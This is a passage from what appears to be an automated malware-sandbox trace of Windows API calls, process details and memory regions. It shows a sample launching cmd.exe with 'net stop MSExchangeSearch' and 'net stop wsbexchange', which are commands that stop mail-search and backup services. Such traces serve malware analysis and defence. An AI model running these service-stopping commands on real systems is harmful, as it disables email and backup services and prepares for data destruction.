(_String1="MSEXCHANGESEARCH", _String2="ALERTER") returned 12 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="NETLOGON") returned -1 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="NETLOGON") returned -1 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="NETPOPUP") returned -1 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="NETPOPUP") returned -1 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="SQLSERVER") returned -6 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="SQLSERVER") returned -6 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="REPLICATOR") returned -5 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="REPLICATOR") returned -5 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="REMOTEBOOT") returned -5 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="REMOTEBOOT") returned -5 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="TIMESOURCE") returned -7 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="TIMESOURCE") returned -7 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="AFP") returned 12 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="AFP") returned 12 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="UPS") returned -8 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="UPS") returned -8 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="XACTSRV") returned -11 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="XACTSRV") returned -11 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="TCPIP") returned -7 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="TCPIP") returned -7 [0139.977] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xdd3760 [0139.978] OpenServiceW (hSCManager=0xdd3760, lpServiceName="MSEXCHANGESEARCH", dwDesiredAccess=0x84) returned 0x0 [0139.978] GetLastError () returned 0x424 [0139.978] CloseServiceHandle (hSCObject=0xdd3760) returned 1 [0139.978] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0139.978] LoadLibraryW (lpLibFileName="NETMSG") returned 0xd90000 [0139.979] FormatMessageW (in: dwFlags=0x2a00, lpSource=0xd90000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0139.979] GetFileType (hFile=0x40) returned 0x2 [0139.979] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xd5f930 | out: lpMode=0xd5f930) returned 1 [0139.980] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xd5f93c, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xd5f93c*=0x1e) returned 1 [0139.980] GetFileType (hFile=0x40) returned 0x2 [0139.980] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xd5f930 | out: lpMode=0xd5f930) returned 1 [0139.980] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xd5f93c, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xd5f93c*=0x2) returned 1 [0139.980] _ultow (in: _Dest=0x889, _Radix=14022992 | out: _Dest=0x889) returned="2185" [0139.980] FormatMessageW (in: dwFlags=0x2800, lpSource=0xd90000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0139.981] GetFileType (hFile=0x40) returned 0x2 [0139.981] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xd5f920 | out: lpMode=0xd5f920) returned 1 [0139.981] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xd5f92c, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xd5f92c*=0x34) returned 1 [0139.981] GetFileType (hFile=0x40) returned 0x2 [0139.981] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xd5f920 | out: lpMode=0xd5f920) returned 1 [0139.981] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xd5f92c, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xd5f92c*=0x2) returned 1 [0139.981] NetApiBufferFree (Buffer=0xdd7fe8) returned 0x0 [0139.981] NetApiBufferFree (Buffer=0xdd8000) returned 0x0 [0139.981] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeSearch" [0139.982] exit (_Code=2) Thread: id = 730 os_tid = 0xe98 Process: id = "249" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x13a36000" os_pid = "0xe30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop wsbexchange" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11960 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 11961 start_va = 0xb60000 end_va = 0x4b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 11962 start_va = 0x4b60000 end_va = 0x4b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b60000" filename = "" Region: id = 11963 start_va = 0x4b80000 end_va = 0x4b80fff entry_point = 0x0 region_type = private name = "private_0x0000000004b80000" filename = "" Region: id = 11964 start_va = 0x4b90000 end_va = 0x4ba3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b90000" filename = "" Region: id = 11965 start_va = 0x4bb0000 end_va = 0x4beffff entry_point = 0x0 region_type = private name = "private_0x0000000004bb0000" filename = "" Region: id = 11966 start_va = 0x4bf0000 end_va = 0x4ceffff entry_point = 0x0 region_type = private name = "private_0x0000000004bf0000" filename = "" Region: id = 11967 start_va = 0x4cf0000 end_va = 0x4cf3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004cf0000" filename = "" Region: id = 11968 start_va = 0x4d00000 end_va = 0x4d00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d00000" filename = "" Region: id = 11969 start_va = 0x4d10000 end_va = 0x4d11fff entry_point = 0x0 region_type = private name = "private_0x0000000004d10000" filename = "" Region: id = 11970 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11971 start_va = 0x7e800000 end_va = 0x7e822fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e800000" filename = "" Region: id = 11972 start_va = 0x7e826000 end_va = 0x7e826fff entry_point = 0x0 region_type = private name = "private_0x000000007e826000" filename = "" Region: id = 11973 start_va = 0x7e827000 end_va = 0x7e827fff entry_point = 0x0 region_type = private name = "private_0x000000007e827000" filename = "" Region: id = 11974 start_va = 0x7e82d000 end_va = 0x7e82ffff entry_point = 0x0 region_type = private name = "private_0x000000007e82d000" filename = "" Region: id = 11975 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11976 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 11977 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 11978 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11979 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 11980 start_va = 0x4e20000 end_va = 0x4e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e20000" filename = "" Region: id = 11981 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 11982 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 11983 start_va = 0x4ef0000 end_va = 0x4feffff entry_point = 0x0 region_type = private name = "private_0x0000000004ef0000" filename = "" Region: id = 11984 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 12025 start_va = 0x4b60000 end_va = 0x4b6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b60000" filename = "" Region: id = 12026 start_va = 0x4d20000 end_va = 0x4dddfff entry_point = 0x4d20000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12027 start_va = 0x4de0000 end_va = 0x4e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004de0000" filename = "" Region: id = 12028 start_va = 0x4e60000 end_va = 0x4e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e60000" filename = "" Region: id = 12029 start_va = 0x4ff0000 end_va = 0x50effff entry_point = 0x0 region_type = private name = "private_0x0000000004ff0000" filename = "" Region: id = 12030 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 12031 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 12032 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 12033 start_va = 0x7e700000 end_va = 0x7e7fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e700000" filename = "" Region: id = 12034 start_va = 0x7e82a000 end_va = 0x7e82cfff entry_point = 0x0 region_type = private name = "private_0x000000007e82a000" filename = "" Region: id = 12035 start_va = 0x4b70000 end_va = 0x4b73fff entry_point = 0x0 region_type = private name = "private_0x0000000004b70000" filename = "" Region: id = 12036 start_va = 0x4b80000 end_va = 0x4b83fff entry_point = 0x0 region_type = private name = "private_0x0000000004b80000" filename = "" Region: id = 12037 start_va = 0x50f0000 end_va = 0x5426fff entry_point = 0x50f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 731 os_tid = 0xcd4 [0140.189] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0140.189] __set_app_type (_Type=0x1) [0140.189] __p__fmode () returned 0x77ac4d6c [0140.190] __p__commode () returned 0x77ac5b1c [0140.190] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0140.190] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0140.190] GetCurrentThreadId () returned 0xcd4 [0140.190] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcd4) returned 0x84 [0140.190] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0140.190] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0140.190] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.193] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.193] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4cefa44 | out: phkResult=0x4cefa44*=0x0) returned 0x2 [0140.193] VirtualQuery (in: lpAddress=0x4cefa4b, lpBuffer=0x4cef9fc, dwLength=0x1c | out: lpBuffer=0x4cef9fc*(BaseAddress=0x4cef000, AllocationBase=0x4bf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.193] VirtualQuery (in: lpAddress=0x4bf0000, lpBuffer=0x4cef9fc, dwLength=0x1c | out: lpBuffer=0x4cef9fc*(BaseAddress=0x4bf0000, AllocationBase=0x4bf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.193] VirtualQuery (in: lpAddress=0x4bf1000, lpBuffer=0x4cef9fc, dwLength=0x1c | out: lpBuffer=0x4cef9fc*(BaseAddress=0x4bf1000, AllocationBase=0x4bf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.193] VirtualQuery (in: lpAddress=0x4bf3000, lpBuffer=0x4cef9fc, dwLength=0x1c | out: lpBuffer=0x4cef9fc*(BaseAddress=0x4bf3000, AllocationBase=0x4bf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.193] VirtualQuery (in: lpAddress=0x4cf0000, lpBuffer=0x4cef9fc, dwLength=0x1c | out: lpBuffer=0x4cef9fc*(BaseAddress=0x4cf0000, AllocationBase=0x4cf0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0140.193] GetConsoleOutputCP () returned 0x1b5 [0140.193] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0140.193] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0140.193] _get_osfhandle (_FileHandle=1) returned 0x3c [0140.193] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0140.194] _get_osfhandle (_FileHandle=1) returned 0x3c [0140.194] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0140.194] _get_osfhandle (_FileHandle=1) returned 0x3c [0140.194] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0140.194] _get_osfhandle (_FileHandle=0) returned 0x38 [0140.194] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0140.194] _get_osfhandle (_FileHandle=0) returned 0x38 [0140.194] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0140.194] GetEnvironmentStringsW () returned 0x4ef7d58* [0140.194] FreeEnvironmentStringsA (penv="A") returned 1 [0140.194] GetEnvironmentStringsW () returned 0x4ef7d58* [0140.195] FreeEnvironmentStringsA (penv="A") returned 1 [0140.195] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4cee9a8 | out: phkResult=0x4cee9a8*=0x94) returned 0x0 [0140.195] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4cee9ac, lpData=0x4cee9b4, lpcbData=0x4cee9b0*=0x1000 | out: lpType=0x4cee9ac*=0x0, lpData=0x4cee9b4*=0x0, lpcbData=0x4cee9b0*=0x1000) returned 0x2 [0140.195] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4cee9ac, lpData=0x4cee9b4, lpcbData=0x4cee9b0*=0x1000 | out: lpType=0x4cee9ac*=0x4, lpData=0x4cee9b4*=0x1, lpcbData=0x4cee9b0*=0x4) returned 0x0 [0140.195] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4cee9ac, lpData=0x4cee9b4, lpcbData=0x4cee9b0*=0x1000 | out: lpType=0x4cee9ac*=0x0, lpData=0x4cee9b4*=0x1, lpcbData=0x4cee9b0*=0x1000) returned 0x2 [0140.195] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4cee9ac, lpData=0x4cee9b4, lpcbData=0x4cee9b0*=0x1000 | out: lpType=0x4cee9ac*=0x4, lpData=0x4cee9b4*=0x0, lpcbData=0x4cee9b0*=0x4) returned 0x0 [0140.195] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4cee9ac, lpData=0x4cee9b4, lpcbData=0x4cee9b0*=0x1000 | out: lpType=0x4cee9ac*=0x4, lpData=0x4cee9b4*=0x40, lpcbData=0x4cee9b0*=0x4) returned 0x0 [0140.195] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4cee9ac, lpData=0x4cee9b4, lpcbData=0x4cee9b0*=0x1000 | out: lpType=0x4cee9ac*=0x4, lpData=0x4cee9b4*=0x40, lpcbData=0x4cee9b0*=0x4) returned 0x0 [0140.195] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4cee9ac, lpData=0x4cee9b4, lpcbData=0x4cee9b0*=0x1000 | out: lpType=0x4cee9ac*=0x0, lpData=0x4cee9b4*=0x40, lpcbData=0x4cee9b0*=0x1000) returned 0x2 [0140.195] RegCloseKey (hKey=0x94) returned 0x0 [0140.195] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4cee9a8 | out: phkResult=0x4cee9a8*=0x94) returned 0x0 [0140.195] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4cee9ac, lpData=0x4cee9b4, lpcbData=0x4cee9b0*=0x1000 | out: lpType=0x4cee9ac*=0x0, lpData=0x4cee9b4*=0x40, lpcbData=0x4cee9b0*=0x1000) returned 0x2 [0140.195] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4cee9ac, lpData=0x4cee9b4, lpcbData=0x4cee9b0*=0x1000 | out: lpType=0x4cee9ac*=0x4, lpData=0x4cee9b4*=0x1, lpcbData=0x4cee9b0*=0x4) returned 0x0 [0140.195] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4cee9ac, lpData=0x4cee9b4, lpcbData=0x4cee9b0*=0x1000 | out: lpType=0x4cee9ac*=0x0, lpData=0x4cee9b4*=0x1, lpcbData=0x4cee9b0*=0x1000) returned 0x2 [0140.195] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4cee9ac, lpData=0x4cee9b4, lpcbData=0x4cee9b0*=0x1000 | out: lpType=0x4cee9ac*=0x4, lpData=0x4cee9b4*=0x0, lpcbData=0x4cee9b0*=0x4) returned 0x0 [0140.195] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4cee9ac, lpData=0x4cee9b4, lpcbData=0x4cee9b0*=0x1000 | out: lpType=0x4cee9ac*=0x4, lpData=0x4cee9b4*=0x9, lpcbData=0x4cee9b0*=0x4) returned 0x0 [0140.195] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4cee9ac, lpData=0x4cee9b4, lpcbData=0x4cee9b0*=0x1000 | out: lpType=0x4cee9ac*=0x4, lpData=0x4cee9b4*=0x9, lpcbData=0x4cee9b0*=0x4) returned 0x0 [0140.195] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4cee9ac, lpData=0x4cee9b4, lpcbData=0x4cee9b0*=0x1000 | out: lpType=0x4cee9ac*=0x0, lpData=0x4cee9b4*=0x9, lpcbData=0x4cee9b0*=0x1000) returned 0x2 [0140.195] RegCloseKey (hKey=0x94) returned 0x0 [0140.195] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2983d [0140.195] srand (_Seed=0x5ad2983d) [0140.195] GetCommandLineW () returned="/c net stop wsbexchange" [0140.195] GetCommandLineW () returned="/c net stop wsbexchange" [0140.195] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0140.195] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4ef9cb0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0140.195] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0140.195] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.195] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.196] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.196] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.196] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.196] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.196] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.196] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.196] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.196] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.196] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.196] GetEnvironmentStringsW () returned 0x4ef7d58* [0140.196] FreeEnvironmentStringsA (penv="A") returned 1 [0140.196] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.196] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.196] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.196] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.196] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.196] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.196] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.196] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.196] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.196] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.196] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4cef780 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0140.196] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4cef780, lpFilePart=0x4cef778 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4cef778*="Desktop") returned 0x1d [0140.196] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0140.196] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4cef500 | out: lpFindFileData=0x4cef500) returned 0x4ef05c8 [0140.197] FindClose (in: hFindFile=0x4ef05c8 | out: hFindFile=0x4ef05c8) returned 1 [0140.197] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4cef500 | out: lpFindFileData=0x4cef500) returned 0x4ef05c8 [0140.197] FindClose (in: hFindFile=0x4ef05c8 | out: hFindFile=0x4ef05c8) returned 1 [0140.197] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0140.197] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4cef500 | out: lpFindFileData=0x4cef500) returned 0x4ef05c8 [0140.197] FindClose (in: hFindFile=0x4ef05c8 | out: hFindFile=0x4ef05c8) returned 1 [0140.197] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0140.197] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0140.197] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0140.197] GetEnvironmentStringsW () returned 0x4ef7d58* [0140.197] FreeEnvironmentStringsA (penv="=") returned 1 [0140.197] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0140.198] GetConsoleOutputCP () returned 0x1b5 [0140.198] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0140.198] GetUserDefaultLCID () returned 0x409 [0140.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0140.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4cef8b0, cchData=128 | out: lpLCData="0") returned 2 [0140.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4cef8b0, cchData=128 | out: lpLCData="0") returned 2 [0140.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4cef8b0, cchData=128 | out: lpLCData="1") returned 2 [0140.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0140.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0140.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0140.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0140.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0140.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0140.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | 